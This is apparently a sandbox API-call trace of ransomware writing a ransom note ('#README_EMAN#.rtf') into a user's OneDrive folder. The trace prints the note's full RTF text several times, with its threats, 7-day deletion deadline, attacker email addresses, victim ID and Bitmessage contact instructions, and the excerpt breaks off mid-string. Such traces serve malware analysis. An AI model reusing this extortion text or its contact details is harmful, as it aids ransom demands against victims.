ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0295.510] WriteFile (in: hFile=0x2ec, lpBuffer=0x236ff98*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x236ff98*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0295.511] CloseHandle (hObject=0x2ec) returned 1 [0295.511] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\nn-no\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\nn-no\\#readme_eman#.rtf")) returned 0xffffffff [0295.511] GetLastError () returned 0x2 [0295.511] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\nn-no\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\nn-no\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0295.514] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0295.514] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0295.514] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x236ff98, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh 